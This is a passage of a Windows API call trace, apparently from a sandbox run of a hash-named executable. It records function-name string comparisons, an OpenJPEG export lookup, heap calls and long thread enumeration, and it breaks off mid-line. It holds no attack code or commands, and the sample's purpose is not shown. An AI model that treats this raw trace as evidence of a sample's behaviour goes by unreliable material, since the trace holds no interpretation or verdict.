lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0254.091] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0254.091] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0254.091] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0254.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0254.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0254.092] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0254.092] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0254.092] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0254.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0254.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0254.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0254.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0254.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0254.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0254.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0254.095] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0254.096] GetProcessHeap () returned 0x430000 [0254.096] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c95030 | out: hHeap=0x430000) returned 1 [0254.105] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0254.105] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0254.106] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1000) returned 0x2c95030 [0254.107] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x26) returned 0x438140 [0254.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_end_decompress", cchWideChar=-1, lpMultiByteStr=0x438140, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_end_decompress", lpUsedDefaultChar=0x0) returned 19 [0254.107] GetLastError () returned 0x0 [0254.107] SetLastError (dwErrCode=0x0) [0254.107] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_end_decompressW") returned 0x0 [0254.108] GetLastError () returned 0x7f [0254.108] SetLastError (dwErrCode=0x7f) [0254.108] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_end_decompressA") returned 0x0 [0254.108] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_end_decompress") returned 0x7ffc45f19a80 [0254.108] GetActiveWindow () returned 0x0 [0254.108] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c95030 | out: hHeap=0x430000) returned 1 [0254.108] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438140 | out: hHeap=0x430000) returned 1 [0254.108] GetCurrentProcessId () returned 0x12a4 [0254.108] GetCurrentThreadId () returned 0x12bc [0254.108] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0254.116] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.264] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.266] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.266] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.268] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.268] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.269] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.945] Thread32Next 